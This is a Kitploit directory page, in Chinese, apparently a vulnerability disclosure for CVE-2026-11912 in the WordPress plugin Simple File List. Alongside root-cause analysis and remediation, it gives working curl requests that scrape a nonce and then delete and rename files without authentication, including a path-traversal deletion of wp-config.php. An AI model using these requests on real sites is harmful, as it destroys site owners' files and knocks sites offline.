Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
By-Poloss..-..CVE-2026-11912 — 缺失授权导致未经身份验证的文件修改 | Kitploit
工具/GitHubGitHub/polosss/by-poloss..-..cve-2026-11912
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试学习与教育
GitHubpolosss/by-poloss..-..cve-2026-11912

By-Poloss..-..CVE-2026-11912

缺失授权导致未经身份验证的文件修改

查看仓库
22个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-11912:Simple File List <= 6.3.7 - 授权缺失导致未认证文件修改

执行摘要

字段值
CVE IDCVE-2026-11912
CVSS 评分7.5(高危)
CVSS 向量CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
受影响插件Simple File List
受影响版本<= 6.3.7
已修复版本6.3.8
发布时间2026年6月19日
研究人员Chloe Chamberland - Wordfence
实验室环境poloss-lab.ddev.site (DDEV)

漏洞详情

描述

WordPress 插件 Simple File List 在全部版本(包括 6.3.7 及之前版本)中存在因授权检查不足导致的任意文件修改漏洞。这使得未经身份验证的攻击者能够删除和修改服务器上的文件。

根本原因分析

漏洞存在的原因如下:

  1. AJAX 端点注册:simplefilelist_edit_job AJAX 操作同时通过 wp_ajax_ 和 wp_ajax_nopriv_ 钩子注册,从而允许未认证访问:

    root@kitploit:~
    add_action('wp_ajax_simplefilelist_edit_job', 'simplefilelist_edit_job');
    add_action('wp_ajax_nopriv_simplefilelist_edit_job', 'simplefilelist_edit_job');
    
  2. 存在缺陷的授权检查:eeSFL_FileEditor()(第 1265 行)中的授权逻辑使用:

    root@kitploit:~
    if(!is_admin() AND $eeSFL->eeListSettings['AllowFrontManage'] != 'YES') {
        return;
    }
    

    is_admin() 函数在 AJAX 请求中返回 FALSE,导致在评估 AllowFrontManage 设置之前授权检查即提前短路。

  3. Nonce 泄露:安全 nonce (eeSFL_ActionNonce) 通过 wp_create_nonce() 生成,并暴露在前端 HTML 源代码中,允许攻击者在无需认证的情况下提取它。

影响评估

机密性影响:高

  • 可通过文件列表读取文件内容
  • 文件元数据(名称、大小、日期)被暴露

完整性影响:高(严重)

  • 未经认证的文件删除
  • 未经认证的文件重命名
  • 未经认证的文件描述修改
  • 路径遍历允许删除关键文件(包括 wp-config.php)

可用性影响:无

  • 文件操作不会直接导致拒绝服务,但可通过文件删除间接影响可用性

真实环境利用演示

测试期间,该漏洞被成功利用来删除 WordPress 配置文件(wp-config.php),导致网站彻底瘫痪。 这展示了该漏洞路径遍历方面的严重性。

PoC 利用步骤

第 1 步:从前端提取 Nonce

root@kitploit:~
# 从文件列表页面获取安全 nonce
curl -k -sL "https://poloss-lab.ddev.site/file-list/" | grep -o 'eeSFL_ActionNonce">[^<]*'
# 输出: eeSFL_ActionNonce">1c14af78c2

第 2 步:未经认证的文件删除

root@kitploit:~
curl -k -s "https://poloss-lab.ddev.site/wp-admin/admin-ajax.php" -X POST \
  -d "action=simplefilelist_edit_job" \
  -d "eeSecurity=1c14af78c2" \
  -d "eeSFL_ID=1" \
  -d "eeFileAction=Delete" \
  -d "eeFileName=test.txt"
# 响应: SUCCESS

第 3 步:未经认证的文件重命名

root@kitploit:~
curl -k -s "https://poloss-lab.ddev.site/wp-admin/admin-ajax.php" -X POST \
  -d "action=simplefilelist_edit_job" \
  -d "eeSecurity=1c14af78c2" \
  -d "eeSFL_ID=1" \
  -d "eeFileAction=Edit" \
  -d "eeFileName=original.pdf" \
  -d "eeFileNameNew=malicious.pdf"
# 响应: SUCCESS

第 4 步:路径遍历(严重 - 删除 wp-config.php)

root@kitploit:~
curl -k -s "https://poloss-lab.ddev.site/wp-admin/admin-ajax.php" -X POST \
  -d "action=simplefilelist_edit_job" \
  -d "eeSecurity=1c14af78c2" \
  -d "eeSFL_ID=1" \
  -d "eeFileAction=Delete" \
  -d "eeFileName=../../wp-config.php"
# 响应: SUCCESS(严重 - 这会破坏网站!)

修复方案

立即操作

  1. 更新插件:升级到 Simple File List 6.3.8 或更高版本
  2. 检查是否被入侵:审计文件系统是否存在未经授权的修改
  3. 恢复备份:如果 wp-config.php 受到影响,请从备份中恢复

临时缓解措施(如果无法立即更新)

  1. 在修补前禁用 Simple File List 插件
  2. 删除所有包含 [eeSFL] 短代码的页面
  3. 实施 WAF 规则以阻止可疑的 AJAX 请求:
    root@kitploit:~
    # 阻止 simplefilelist_edit_job AJAX 调用
    <IfModule mod_rewrite.c>
        RewriteEngine On
        RewriteCond %{QUERY_STRING} action=simplefilelist_edit_job
        RewriteRule ^wp-admin/admin-ajax\.php$ - [F,L]
    </IfModule>
    

长期建议

  • 实施请求来源验证(CSRF 防护)
  • 为所有文件操作添加能力检查
  • 对 AJAX 端点进行速率限制
  • 监控日志以发现可疑文件操作

参考资料

  • Wordfence 情报
  • Simple File List 插件页面
  • 插件 SVN 主干

测试环境

  • 实验室:DDEV poloss-lab
  • URL:https://poloss-lab.ddev.site
  • 测试插件版本:6.3.7
  • WordPress 版本:最新版(PHP 8.4)

本报告由 Claude Code - WordPress 安全测试实验室生成 日期:2026年6月20日

下载工具